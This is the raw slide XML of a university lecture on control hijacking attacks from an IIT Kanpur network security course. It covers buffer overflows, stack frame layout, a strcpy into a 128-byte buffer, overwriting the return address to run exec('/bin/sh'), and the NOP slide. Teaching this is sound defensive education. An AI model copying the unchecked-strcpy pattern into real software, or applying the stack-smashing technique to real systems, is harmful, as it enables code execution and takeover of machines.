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9" r:id="rId2"/>
    <p:sldId id="330" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="31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76" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="104" d="100"/>
          <a:sy n="104" d="100"/>
        </p:scale>
        <p:origin x="-18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850C-A33D-4048-83FD-DD2EAD2F55CB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3F880-9B25-4C43-B311-E3259D01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BSS = Block Started by Symbol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Animated cursor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> on web page or email message would result in arbitrary code execution.   Used for rendering cursors, animated cursors, and icons.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8494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Windows media player bitmaps  (skins) – heap overflow,  Feb. 2006</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>setjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – used for exception handling (jump to global error handling code in case of error)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28700"/>
            <a:ext cx="38100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19600" y="1028700"/>
            <a:ext cx="3810000" cy="37719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59531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1328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2:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Systems and Network Security CSE 628/628A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Sandeep K. Shukla</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Indian Institute of Technology Kanpur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Control hijacking attacks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23950"/>
            <a:ext cx="8178800" cy="3657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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>Attacker’s goal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Take over target machine     (e.g.  web server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Execute arbitrary code on target by </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>hijacking application control flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Examples.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Buffer overflow attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Integer overflow attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Format string vulnerabilities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285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395"/>
            <a:ext cx="7772400" cy="54887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1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>uffer overflows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81002" y="819150"/>
            <a:ext cx="8177213" cy="39433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1951038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Extremely common bug in C/C++ programs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="684213" lvl="1" indent="-227013">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="1951038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>First major exploit:  1988 Internet Worm.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>fingerd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  <a:tabLst>
                <a:tab pos="1951038" algn="l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spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1951038" algn="l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spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1951038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1951038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="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110256522"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1905000" y="1885951"/>
          <a:ext cx="4267200" cy="2844143"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s4098" name="Chart" r:id="rId3" imgW="6096090" imgH="4067280" progId="MSGraph.Chart.8">
              <p:embed followColorScheme="full"/>
            </p:oleObj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447042" y="3757613"/>
            <a:ext cx="1872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Source:  NVD/CVE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319839" y="2366963"/>
            <a:ext cx="1736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 typeface="Symbol" pitchFamily="18" charset="2"/>
              <a:buChar char="»"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>20% of all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>vuln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933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What is needed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763000" cy="417195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Understanding C functions, the stack, and the heap.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Know how system calls are made</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The exec() system call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="150000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attacker needs to know which CPU and OS used on the target machine:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Our examples are for  x86  running  Linux or Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Details vary slightly between CPUs and OSs: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Little endian vs. big endian  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x86 vs. Motorola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Stack Frame structure     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Unix vs. Windows)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609600" y="222885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62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0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Linux Process Memory Layout</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="96258" name="Picture 2" descr="Flexible Process Address Space Layout In Linu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666750"/>
            <a:ext cx="6629400" cy="4319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514600" y="3067050"/>
            <a:ext cx="35052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400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xception handlers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Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frame</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>http://post.queensu.ca/~trd/377/tut5/stack.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0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497138" y="1416050"/>
            <a:ext cx="3505200" cy="9501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a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rguments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497138" y="2378869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r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eturn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="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97138" y="2734469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s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rame 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lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ointer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497138" y="3638550"/>
            <a:ext cx="3505200" cy="66913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ocal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>variables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90942" y="4396086"/>
            <a:ext cx="48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SP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560513" y="4588966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916738" y="1485900"/>
            <a:ext cx="0" cy="30861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497138" y="1485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2497138" y="1445420"/>
            <a:ext cx="3505200" cy="287893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2192338" y="1439069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952630" y="3773093"/>
            <a:ext cx="1126462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</a:p>
          <a:p>
            <a:pPr algn="ctr"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400"/>
              <a:t>Growth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52600" y="1121569"/>
            <a:ext cx="744538" cy="1828800"/>
            <a:chOff x="1104" y="1104"/>
            <a:chExt cx="469" cy="1536"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8218" name="Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1104" y="2640"/>
              <a:ext cx="4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23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153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2497138" y="1200152"/>
            <a:ext cx="0" cy="7643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6005513" y="1200152"/>
            <a:ext cx="0" cy="7643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29400" y="112395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29402" y="4552950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4248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>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> saved registers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2192338" y="4629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6005514" y="3979070"/>
            <a:ext cx="14287" cy="9548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>
            <a:off x="2487614" y="3979070"/>
            <a:ext cx="14287" cy="9548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3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1276351"/>
            <a:ext cx="3570208" cy="17543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80000"/>
              </a:spcBef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func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(char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[128];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	do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-something(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1" y="1257240"/>
            <a:ext cx="4576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a web server contains a function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000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684" y="1809750"/>
            <a:ext cx="4041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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>() is called stack looks like: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2724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argument:   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0670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r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>eturn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>address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7800" y="33718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s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>tack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>rame </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ointer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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3714750"/>
            <a:ext cx="35052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c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>har </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>[128]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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-34164" y="4686240"/>
            <a:ext cx="436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SP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1175" y="4879121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143000" y="48577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143000" y="2724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03262" y="2497932"/>
            <a:ext cx="744538" cy="1064419"/>
            <a:chOff x="1104" y="1104"/>
            <a:chExt cx="469" cy="1536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104" y="2640"/>
              <a:ext cx="4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153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447800" y="24955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953002" y="2457450"/>
            <a:ext cx="3175" cy="3429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1447801" y="4471990"/>
            <a:ext cx="3175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953002" y="4471989"/>
            <a:ext cx="3175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447800" y="2724150"/>
            <a:ext cx="35052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xmlns="" val="19818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1276351"/>
            <a:ext cx="3570208" cy="17543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80000"/>
              </a:spcBef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func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(char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[128];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	do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-something(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1" y="1276351"/>
            <a:ext cx="393857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000" dirty="0"/>
              <a:t>What if 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dirty="0"/>
              <a:t>   is  136 bytes long?   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>After  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/>
              <a:t>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2724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a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>rgument:   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0670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r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>eturn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>address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7800" y="33718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s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>tack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>rame </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ointer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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3714750"/>
            <a:ext cx="35052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c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>har </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>[128]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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-34164" y="4686240"/>
            <a:ext cx="436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SP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1175" y="4879121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143000" y="48577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143000" y="2724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447800" y="24955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953002" y="2457450"/>
            <a:ext cx="3175" cy="3429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1447801" y="4471990"/>
            <a:ext cx="3175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953002" y="4471989"/>
            <a:ext cx="3175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447800" y="2724150"/>
            <a:ext cx="35052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1447800" y="3060701"/>
            <a:ext cx="3505200" cy="176530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143000" y="3105150"/>
            <a:ext cx="152400" cy="1600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1" y="3638550"/>
            <a:ext cx="587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1" y="3638550"/>
            <a:ext cx="3640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Problem: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/>
              <a:t>no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>length checking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>in  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy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5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867400" y="25717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842552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867400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EEECE1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="EEECE1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>har </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="EEECE1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="EEECE1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[128]</a:t>
            </a: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867400" y="29146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r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eturn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="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867400" y="32194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3" y="-47624"/>
            <a:ext cx="5410199" cy="7905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Basic stack exploit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>
          <a:xfrm>
            <a:off x="457203" y="977504"/>
            <a:ext cx="4648199" cy="4185047"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2376"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Suppose    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>is such that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   after  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  stack looks like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2376"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Program P:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exec(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2376"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2376"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>When   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>func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  <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>   exits,  the user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>gets shell  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Note:  attack code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>P runs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>in stack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537752" y="4667251"/>
            <a:ext cx="307284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5588000" y="253365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42551" y="4243390"/>
            <a:ext cx="2416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8509553" y="4243389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48" name="Rectangle 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867400" y="1657350"/>
            <a:ext cx="2667000" cy="838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666750"/>
            <a:ext cx="2667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Program P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H="1">
            <a:off x="8511967" y="514351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>
            <a:off x="5842552" y="514351"/>
            <a:ext cx="24848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2" name="Freeform 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5121748" y="1581150"/>
            <a:ext cx="732952" cy="1504950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 732952 w 732952"/>
              <a:gd name="connsiteY0" fmla="*/ 1155700 h 1155700"/>
              <a:gd name="connsiteX1" fmla="*/ 466252 w 732952"/>
              <a:gd name="connsiteY1" fmla="*/ 965200 h 1155700"/>
              <a:gd name="connsiteX2" fmla="*/ 47152 w 732952"/>
              <a:gd name="connsiteY2" fmla="*/ 635000 h 1155700"/>
              <a:gd name="connsiteX3" fmla="*/ 72552 w 732952"/>
              <a:gd name="connsiteY3" fmla="*/ 203200 h 1155700"/>
              <a:gd name="connsiteX4" fmla="*/ 605952 w 732952"/>
              <a:gd name="connsiteY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952" h="1155700">
                <a:moveTo>
                  <a:pt x="732952" y="1155700"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="656752" y="1103841"/>
                  <a:pt x="580552" y="1051983"/>
                  <a:pt x="466252" y="965200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="351952" y="878417"/>
                  <a:pt x="112769" y="762000"/>
                  <a:pt x="47152" y="635000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-18465" y="508000"/>
                  <a:pt x="-20581" y="309033"/>
                  <a:pt x="72552" y="203200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="165685" y="97367"/>
                  <a:pt x="605952" y="0"/>
                  <a:pt x="605952" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5715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842552" y="2533651"/>
            <a:ext cx="26670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915400" y="895350"/>
            <a:ext cx="0" cy="36576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19625" y="4476750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19623" y="59055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33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33350"/>
            <a:ext cx="3962400" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The NOP slide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76352"/>
            <a:ext cx="45720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Problem:   how does attacker </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	      determine ret-address?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Solution:   NOP slide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Guess approximate stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>state </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>func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  <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>called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Insert many NOPs before program P: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nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  ,    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>eax,eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>     ,    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> ax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7400" y="25717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42552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867400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EEECE1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="EEECE1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>har </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="EEECE1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="EEECE1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[128]</a:t>
            </a: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67400" y="29146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r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eturn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="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67400" y="32194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5537752" y="4667251"/>
            <a:ext cx="307284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588000" y="253365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5842551" y="4243390"/>
            <a:ext cx="2416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509553" y="4243389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5867400" y="1657350"/>
            <a:ext cx="2667000" cy="838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NOP Slide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666750"/>
            <a:ext cx="2667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Program P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H="1">
